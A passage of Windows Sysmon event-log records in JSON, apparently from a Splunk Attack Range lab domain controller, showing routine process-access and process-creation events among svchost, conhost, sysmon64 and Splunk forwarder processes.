C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:35.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2340,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:35.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:35.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2341,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:35.329\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F7F-5F25-0000-001042210400}\r\nTargetProcessId: 3424\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:35.329","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F7F-5F25-0000-001042210400}","TargetProcessId":"3424","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2342,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:35.470\r\nSourceProcessGUID: {41C8662E-1F7F-5F25-0000-001042210400}\r\nSourceProcessId: 3424\r\nSourceThreadId: 3420\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:35.470","SourceProcessGUID":"{41C8662E-1F7F-5F25-0000-001042210400}","SourceProcessId":"3424","SourceThreadId":"3420","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2343,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:36.007\r\nProcessGuid: {41C8662E-1F80-5F25-0000-00100F230400}\r\nProcessId: 3948\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:36.007","ProcessGuid":"{41C8662E-1F80-5F25-0000-00100F230400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2344,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:36.173\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3076\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F80-5F25-0000-00100F230400}\r\nTargetProcessId: 3948\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:36.173","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3076","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F80-5F25-0000-00100F230400}","TargetProcessId":"3948","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2345,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:36.189\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F80-5F25-0000-00100F230400}\r\nTargetProcessId: 3948\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:36.189","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F80-5F25-0000-00100F230400}","TargetProcessId":"3948","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2346,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:36.189\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:36.189","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2347,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:36.189\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:36.189","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2348,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:36.189\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 